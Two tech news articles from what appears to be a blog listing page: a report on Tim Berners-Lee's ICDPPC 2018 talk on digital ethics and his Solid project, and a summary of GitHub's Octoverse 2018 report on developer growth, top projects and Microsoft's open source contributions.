At the ongoing 40th ICDPPC, International Conference of Data Protection and Privacy Commissioners conference, Sir Tim Berners-Lee spoke on ethics and the Internet. The ICDPPC conference which is taking place in Brussels this week brings together an international audience on digital ethics, a topic the European Data Protection Supervisor initiated in 2015. Some high profile speakers and their presentations include Giovanni Buttarelli, European Data Protection Supervisor on ‘Choose Humanity: Putting Dignity back into Digital’; Video interview with Guido Raimondi, President of the European Court of Human Rights; Tim Cook, CEO Apple on personal data and user privacy; ‘What is Ethics?’ by Anita Allen, Professor of Law and Professor of Philosophy, University of Pennsylvania among others. Per Techcrunch, Tim Berners-Lee has urged tech industries and experts to pay continuous attention to the world their software is consuming as they go about connecting humanity through technology. “Ethics, like technology, is design. As we’re designing the system, we’re designing society. Ethical rules that we choose to put in that design [impact the society]… Nothing is self-evident. Everything has to be put out there as something that we think will be a good idea as a component of our society.” he told the delegates present at the conference. He also described digital platforms as “socio-technical systems” — meaning “it’s not just about the technology when you click on the link it is about the motivation someone has, to make such a great thing and get excited just knowing that other people are reading the things that they have written”. “We must consciously decide on both of these, both the social side and the technical side,” he said. “The tech platforms are anthropogenic. They’re made by people. They’re coded by people. And the people who code them are constantly trying to figure out how to make them better.” According to Techcrunch, he also touched on the Cambridge Analytica data misuse scandal as an illustration of how sociotechnical systems are exploding simple notions of individual rights. “You data is being taken and mixed with that of millions of other people, billions of other people in fact, and then used to manipulate everybody. Privacy is not just about not wanting your own data to be exposed — it’s not just not wanting the pictures you took of yourself to be distributed publicly. But that is important too.” He also revealed new plans about his startup, Inrupt, which was launched last month to change the web for the better. His major goal with Inrupt is to decentralize the web and to get rid of gigantic tech monopolies’ (Facebook, Google, Amazon, etc) stronghold over user data. He hopes to achieve this with Inrupt’s new open source-project, Solid, a platform built using the existing web format. He explained that his platform can put people in control of their own data. The app, he explains, asks you where you want to put your data. So you can run your photo app or take pictures on your phone and say I want to store them on Dropbox, and I will store them on my own home computer. And it does this with a new technology which provides interoperability between any app and any store.” “The platform turns the privacy world upside down — or, I should say, it turns the privacy world right side up. You are in control of you data life… Wherever you store it you can control and get access to it.” He concluded saying that “We have to get commitments from companies to make their platforms constructive and we have to get commitments from governments to look at whenever they see that a new technology allows people to be taken advantage of, allows a new form of crime to get onto it by producing new forms of the law. And to make sure that the policies that they do are thought about in respect to every new technology as they come out.” The day before yesterday, The Public Voice Coalition, an organization that promotes public participation in decisions regarding the future of the Internet, came out with guidelines for AI, namely, Universal Guidelines on Artificial Intelligence at ICDPPC. Tim Berners-Lee plans to decentralize the web with ‘Solid’, an open-source project for “personal empowerment through data” EPIC’s Public Voice Coalition announces Universal Guidelines for Artificial Intelligence (UGAI) at ICDPPC 2018 California’s tough net neutrality bill passes state assembly vote.
Read more
  • 0
  • 0
  • 2855

article-image-what-we-learnt-from-the-github-octoverse-2018-report
Amey Varangaonkar
24 Oct 2018
8 min read
Save for later

What we learnt from the GitHub Octoverse 2018 Report

Amey Varangaonkar
24 Oct 2018
8 min read
Highlighting key accomplishments over the last one year, Microsoft’s recent major acquisition GitHub released their yearly Octoverse report. The last 365 days have seen GitHub grow from strengths to strengths as the world’s leading source code management platform. The Octoverse report highlights how developers work and learn on GitHub. It also gives us some interesting, insights into the way the developers and even organizations are collaborating across geographies and time-zones, on a variety of interesting projects. The Octoverse report is based on the data collected from October 1 2017 to September 30, 2018, exactly 365 days from the publication of the last Octoverse report. In this article, we look at some of the key takeaways from the Octoverse 2018 report. Asia is home to GitHub’s fastest growing community GitHub developers who are currently based in Asia can feel proud of themselves. Octoverse 2018 states that more open source projects have been created in Asia than anywhere else in the world. While developers all over the world are joining and using GitHub, most new signups over the last year have come from countries such as China, India, and Japan. At the same time, GitHub usage is also growing quite rapidly in Asian countries such as Hong Kong, Singapore, Bangladesh, and Malaysia. This is quite interesting, considering the growth of AI has become part of the national policies in countries such as China, Hong Kong, and Japan. We can expect these trends to continue, and developing countries such as India and Bangladesh to contribute even more going forward. An ever-growing developer community squashes doubts on GitHub’s credibility When Microsoft announced their plans to buy GitHub in a deal worth $7.5 billion, many eyebrows were raised. Given Microsoft’s earlier stance against Open Source projects, some developers were skeptical of this move. They feared that Microsoft would exploit GitHub’s popularity and inject some kind of a subscription model into GitHub in order to recover the huge investment. Many even migrated their projects from GitHub on to rival platforms such as BitBucket and GitLab in protest. However, the numbers presented in the Octoverse report seem to suggest otherwise. According to the report, the number of new registrations last year alone was more than the number of registrations in the first 6 years of GitHub, which is quite impressive. The number of active contributors on GitHub has increased by more than 1.5 times over the last year, suggesting GitHub is still the undisputed leader when it comes to code management and collaboration. With more than 1.1 billion contributions across private and public projects over one year, I think we all know where major developers’ loyalty lies. Not just developers, organizations love GitHub too The Octoverse report states that 2.1 million organizations are using GitHub in some capacity, across public and private repositories. This number is a staggering 40% increase from 2017 - indicating the huge reliance on GitHub for effective code management and collaboration between the developers. Not just that, over 150,000 developers and organizations are using the apps and tools available on the GitHub marketplace for quick, efficient and seamless code development and management. GitHub had also launched a new feature called Security Alerts way back in November 2017. This feature alerted developers of any vulnerabilities in their project dependencies, and also suggested fixes for them from the community. Many organizations have found this feature to be an invaluable offering by GitHub, as it allowed for the development of secure, bug-free applications. Their faith in GitHub will be reinforced even more now that the report has revealed that over the last year, more than 5 million vulnerabilities were detected and communicated across to the developers. The report also suggests that members of an organization make substantial contributions to the projects and are twice as much active when they install and use the company app on GitHub. This suggests that GitHub offers them the best environment and the luxury to develop apps just as they want. All these insights only point towards one simple fact - Organizations and businesses trust GitHub. Microsoft are walking the talk with active open source contribution Microsoft joined the Linux Foundation after its initial (and vehement) opposition to the Open Source movement. With a change in leadership and the long-term vision came the realization that open source is essential for them - and the world - to progress. Eventually, they declared their support for the cause by going platinum with the Open Source initiative. That is now clearly being reflected in their achievements of the past year. Probably the most refreshing takeaway from the Octoverse report was to see Microsoft leading the pack when it comes to active open source contribution. The report states that Microsoft’s VSCode was the top open source project with 19,000 contributors. Also, it declared that the open source documentation of Azure was the fastest growing project on GitHub. Top open source projects on GitHub (Image courtesy: GitHub State of Octoverse 2018 Report) If this was not enough evidence to suggest Microsoft has amped up their claims of supporting the Open Source movement wholeheartedly, there’s more. Over 7000 Microsoft employees have contributed to various open source projects over the past one year, making it the top-most organization with the most Open Source contribution. Open source contribution by organization (Image source: GitHub State of Octoverse 2018 Report) When we said that Microsoft’s acquisition of GitHub was a good move, we were right! React Native and Machine Learning are red hot right now React Native has been touted to be the future of mobile development by many. This claim is corroborated by some strong activity on its GitHub repository over the last year. With over 10k contributors, React Native is one of the most active open source projects right now. With JavaScript continuing to rule the roost for the 5th straight year when it comes to being the top programming language, it comes as no surprise that the cross-platform framework for building native apps is now getting a lot of traction. Top languages over time (Image source: GitHub State of Octoverse 2018 Report) With the rise in popularity of Artificial Intelligence and specifically Machine Learning, the report also highlighted the continued rise of Tensorflow and PyTorch. While Tensorflow is the third most popular open source project right now with over 9000 contributors, Pytorch is one of the fastest growing projects on GitHub. The report also showed that Google and Facebook’s experimental frameworks for machine learning, called Dopamine and Detectron respectively are getting deserved attention thanks to how they are simplifying machine learning. Given the scale at which AI is being applied in the industry right now, these tools are expected to make developers’ lives easier going forward. Hence, it is not surprising to see their interest centered around these tools. GitHub’s Student Developer Pack to promote learning is a success According to the Octoverse report, over 1 million developers have honed their skills by learning best coding practices on GitHub. With over 600,000 active developer students learning how to write effective code through their Student Developer Pack, GitHub continue to give free access to the best development tools so that the students learn by doing and get valuable hands-on experience. In the academia, yet another fact that points to GitHub’s usefulness when it comes to learning is how teachers use the platform to implement real-world workflows for teaching. Over 20,000 teachers in over 18000 schools and universities have used GitHub to create over 200,000 assignments till date. Safe to say that this number is only going to grow in the near future. You can read more about how GitHub is promoting learning in their GitHub Education Classroom Report. GitHub’s competition has some serious catching up to do Since Google’s parent company Alphabet lost out to Microsoft in the race to buy GitHub, they have diverted their attention to GitHub’s competitor GitLab. Alphabet have even gone on to suggest that GitLab can surpass GitHub. According to the Octoverse report, Google are only behind Microsoft when it comes to the most open source contributions by any organization. With Gitlab joining forces with Google by moving their operations to Google Cloud Platform from Azure cloud, we might see Google’s contribution to GitHub reduce significantly over the next few years. Who knows, the next Octoverse report might not feature Google at all! That said, the size of the GitHub community, along with the volume of activity that happens on the platform on a per day basis - are both staggering and no other platforms come even close. This fact was supported by the enormity of some of the numbers that the report presented, such as: There are over 31 million developers on the platform till date. More than 96 million repositories are currently being hosted on GitHub There have been 65 million pull requests created in the last one year alone, contributing to almost 33% of the total number of pull requests created till date These numbers dwarf the other platforms such as GitLab, BitBucket and others, in comparison. Not only is GitHub the world’s most popular code collaboration and version control platform, it is currently the #1 choice of tool for most of the developers in the world. It will take some catching up for the likes of GitLab and others, to come even close to GitHub. In 5 years, machines will do half of our job tasks of today; 1 in 2 employees need reskilling/upskilling now – World Economic Forum survey. Survey reveals how artificial intelligence is impacting developers across the tech landscape What the IEEE 2018 programming languages survey reveals to us
Read more
  • 0
  • 0
  • 4380